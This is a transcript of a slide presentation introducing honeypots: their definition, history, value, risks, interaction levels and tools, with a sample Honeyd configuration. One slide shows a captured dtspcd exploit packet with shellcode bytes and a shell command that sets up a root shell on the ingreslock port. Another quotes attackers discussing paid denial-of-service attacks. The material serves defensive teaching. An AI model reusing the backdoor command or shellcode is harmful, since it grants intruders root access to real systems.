Honeypots - PowerPoint PPT Presentation

About This Presentation

Title:

Honeypots

Description:

Variety of misconceptions about honeypots, everyone has their own definition. ... 1990/1991 The Cuckoo's Egg and Evening with Berferd. 1997 - Deception Toolkit ... – PowerPoint PPT presentation

Number of Views:785

Avg rating:3.0/5.0

Slides: 37

Provided by: theb154

Category:

more less

Transcript and Presenter's Notes

Title: Honeypots

1
Honeypots
2
Your Speaker

Lance Spitzner
Senior Security Architect, Sun Microsystems
Founder of the Honeynet Project
Author of Honeypots Tracking Hackers
Co-author of Know Your Enemy
Moderator of lthoneypots_at_securityfocus.comgt
maillist
Former tread head.

3
Purpose

To introduce you to honeypots, what they are,
how they work, their value.

4
Problem

Variety of misconceptions about honeypots,
everyone has their own definition.
This confusion has caused lack of understanding,
and adoption.

5
Honeypot Timeline

1990/1991 The Cuckoos Egg and Evening with
Berferd
1997 - Deception Toolkit
1998 - CyberCop Sting
1998 - NetFacade (and Snort)
1998 - BackOfficer Friendly
1999 - Formation of the Honeynet Project
2001 - Worms captured
2002 - dtspcd exploit capture

6
Definition

Any security resource whos value lies in
being probed, attacked, or compromised

7
How honeypots work

Simple concept
A resource that expects no data, so any traffic
to or from it is most likely unauthorized activity

8
Not limited to specific purpose

Honeypots do not solve a specific problem,
instead they are a tool that contribute to your
overall security architecture.
Their value, and the problems they help solve,
depend on how build, deploy, and you use them.

9
Types

Production (Law Enforcment)
Research (Counter-Intelligence)
Martys idea

10
Value

What is the value of honeypots?
One of the greatest areas of confusion concerning
honeypot technologies.

11
Advantages

Based on how honeypots conceptually work, they
have several advantages.
Reduce False Positives and False Negatives
Data Value
Resources
Simplicity

12
Disadvantages

Based on the concept of honeypots, they also have
disadvantages
Narrow Field of View
Fingerprinting
Risk

13
Production

Prevention
Detection
Response

14
Prevention

Keeping the burglar out of your house.
Honeypots, in general are not effective
prevention mechanisms.
Deception, Deterence, Decoys, are phsychological
weapons. They do NOT work against automated
attacks
worms
auto-rooters
mass-rooters

15
Detection

Detecting the burglar when he breaks in.
Honeypots excel at this capability, due to their
advantages.

16
Response

Honeypots can be used to help respond to an
incident.
Can easily be pulled offline (unlike production
systems.
Little to no data pollution.

17
Research Honeypots

Early Warning and Prediction
Discover new Tools and Tactics
Understand Motives, Behavior, and Organization
Develop Analysis and Forensic Skills

18
Early Warning and Prediction
19
Tools
01/08-084604.378306 10.10.10.13592 -gt
10.10.10.26112 TCP TTL48 TOS0x0 ID41388
IpLen20 DgmLen1500 DF AP Seq 0xFEE2C115
Ack 0x5F66192F Win 0x3EBC TcpLen 32 TCP
Options (3) gt NOP NOP TS 463986683 4158792 30
30 30 30 30 30 30 32 30 34 31 30 33 65 30 30
0000000204103e00 30 31 20 20 34 20 00 00 00 31 30
00 80 1C 40 11 01 4 ...10..._at_. 80 1C 40 11 10
80 01 01 80 1C 40 11 80 1C 40 11
.._at_......._at_..._at_. 80 1C 40 11 80 1C 40 11 80 1C 40
11 80 1C 40 11 .._at_..._at_..._at_..._at_. D0 23 FF E0 E2
23 FF E4 E4 23 FF E8 C0 23 FF EC
............ 82 10 20 0B 91 D0 20 08 2F 62 69
6E 2F 6B 73 68 .. ... ./bin/ksh 20 20 20 20 2D
63 20 20 65 63 68 6F 20 22 69 6E -c echo
"in 67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D
20 greslock stream 74 63 70 20 6E 6F 77 61 69
74 20 72 6F 6F 74 20 tcp nowait root 2F 62 69
6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F /bin/sh
sh -i"gt/ 74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62
69 6E 2F tmp/x/usr/sbin/ 69 6E 65 74 64 20 2D
73 20 2F 74 6D 70 2F 78 3B inetd -s /tmp/x 73
6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D
sleep 10/bin/rm 20 2D 66 20 2F 74 6D 70 2F 78 20
41 41 41 41 41 -f /tmp/x AAAAA 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
20
Tactics
21
Motives and Behavior
J4ck why don't you start charging for packet
attacks? J4ck "give me x amount
and I'll take bla bla offline for this
amount of time" J1LL it was illegal last I
checked. J4ck heh, then everything you do is
illegal. Why not make money off of
it? J4ck I know plenty of people that'd pay
exorbatent amounts for packeting.
22
Level of Interaction

Level of Interaction determines amount of
functionality a honeypot provides.
The greater the interaction, the more you can
learn.
The greater the interaction, the more complexity
and risk.

23
Risk

Chance that an attacker can use your honeypot to
harm, attack, or infiltrate other systems or
organizations.

24
Low Interaction

Provide Emulated Services
No operating system for attacker to access.
Information limited to transactional information
and attackers activities with emulated services.

25
High Interaction

Provide Actual Operating Systems
Learn extensive amounts of information.
Extensive risk.

26
Honeypots

BackOfficer Friendly
http//www.nfr.com/products/bof/
SPECTER
http//www.specter.com
Honeyd
http//www.citi.umich.edu/u/provos/honeyd/
ManTrap
http//www.recourse.com
Honeynets
http//project.honeynet.org/papers/honeynet/

Low Interaction
High Interaction
27
BackOfficer Friendly
28
Specter
29
Honeyd
create default

set default
personality "FreeBSD 2.2.1-STABLE"

set default default action
open

add default tcp port 80 "sh
/usr/local/honeyd/scripts/web.sh"

add default tcp port 22
"sh /usr/local/honeyd/scripts/test.sh"

add default tcp port
113 reset

add default tcp port 1 reset

create windows set
windows personality "Windows NT 4.0 Server
SP5-SP6" set windows default action reset add
windows tcp port 80 "sh /usr/local/honeyd/scripts/
web.sh"
add
windows tcp port 25 block

add windows tcp port
23 proxy real-server.tracking-hackers.com23 add
windows tcp port 22 proxy ipsrc22 set template
uptime 3284460

bind
192.168.1.200 windows
30
ManTrap
31
Honeynets
32
Which is best?